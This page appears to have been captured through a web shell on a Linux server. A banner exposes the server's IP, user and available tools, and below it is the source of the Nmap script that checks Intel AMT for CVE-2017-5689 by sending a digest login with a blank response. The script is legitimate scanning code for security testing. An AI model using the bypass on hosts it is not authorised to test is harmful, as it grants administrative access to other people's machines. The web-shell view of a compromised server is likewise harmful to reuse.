Server IP : 80.87.202.40 / Your IP : 216.73.216.169 Web Server : Apache System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64 User : bitrix ( 600) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/share/nmap/scripts/ |
Upload File : |
description = [[ Detects if a system with Intel Active Management Technology is vulnerable to the INTEL-SA-00075 privilege escalation vulnerability (CVE2017-5689). This script determines if a target is vulnerable by attempting to perform digest authentication with a blank response parameter. If the authentication succeeds, a HTTP 200 response is received. References: * https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability ]] local string = require "string" local http = require "http" local shortport = require "shortport" local vulns = require "vulns" local rand = require "rand" --- -- @usage -- nmap -p 16992 --script http-vuln-cve2017-5689 <target> -- -- @output -- PORT STATE SERVICE REASON -- 16992/tcp open amt-soap-http syn-ack -- | http-vuln-cve2017-5689: -- | VULNERABLE: -- | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass -- | State: VULNERABLE -- | IDs: CVE:CVE-2017-5689 BID:98269 -- | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C) -- | Intel Active Management Technology is vulnerable to an authentication bypass that -- | can be exploited by performing digest authentication and sending a blank response -- | digest parameter. -- | -- | Disclosure date: 2017-05-01 -- | References: -- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689 -- | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr -- | http://www.securityfocus.com/bid/98269 -- | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf -- | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability -- |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability -- -- @xmloutput -- <table key="CVE-2017-5689"> -- <elem key="title">Intel Active Management Technology INTEL-SA-00075 Authentication Bypass</elem> -- <elem key="state">VULNERABLE</elem> -- <table key="ids"> -- <elem>CVE:CVE-2017-5689</elem> -- <elem>BID:98269</elem> -- </table> -- <table key="scores"> -- <elem key="CVSSv2">10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)</elem> -- </table> -- <table key="description"> -- <elem>Intel Active Management Technology is vulnerable to an authentication bypass that
can be -- exploited by performing digest authentication and sending a blank response
digest parameter.
 -- </elem> -- </table> -- <table key="dates"> -- <table key="disclosure"> -- <elem key="month">05</elem> -- <elem key="day">01</elem> -- <elem key="year">2017</elem> -- </table> -- </table> -- <elem key="disclosure">2017-05-01</elem> -- <table key="refs"> -- <elem>https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr</elem> -- <elem>https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf</elem> -- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689</elem> -- <elem>https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability</elem> -- <elem>https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability</elem> -- <elem>http://www.securityfocus.com/bid/98269</elem> -- </table> -- </table> --- author = "Andrew Orr" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = { "vuln", "auth", "exploit" } portrule = shortport.port_or_service({623, 664, 16992, 16993}, "amt-soap-http") action = function(host, port) local vuln = { title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass", state = vulns.STATE.NOT_VULN, risk_factor = "High", scores = { CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)", }, description = [[ Intel Active Management Technology is vulnerable to an authentication bypass that can be exploited by performing digest authentication and sending a blank response digest parameter. ]], IDS = {CVE = "CVE-2017-5689", BID = "98269"}, references = { 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability', 'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf', 'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability' }, dates = { disclosure = { year = '2017', month = '05', day = '01' } } } local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local response = http.get(host, port, '/index.htm') if response.header['server'] and response.header['server']:find('Intel(R)', 1, true) and response.status and response.status == 401 then local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate']) if www_authenticate[1]['params'] and www_authenticate[1]['params']['realm'] and www_authenticate[1]['params']['nonce'] then local auth_header = string.format("Digest username=\"admin\", realm=\"%s\", nonce=\"%s\", uri=\"index.htm\"," .. "cnonce=\"%s\", nc=1, qop=\"auth\", response=\"\"", www_authenticate[1]['params']['realm'], www_authenticate[1]['params']['nonce'], rand.random_alpha(10)) local opt = { header = { ['Authorization'] = auth_header } } response = http.get(host, port, '/index.htm', opt) if response.status and response.status == 200 then vuln.state = vulns.STATE.VULN end end end return vuln_report:make_output(vuln) end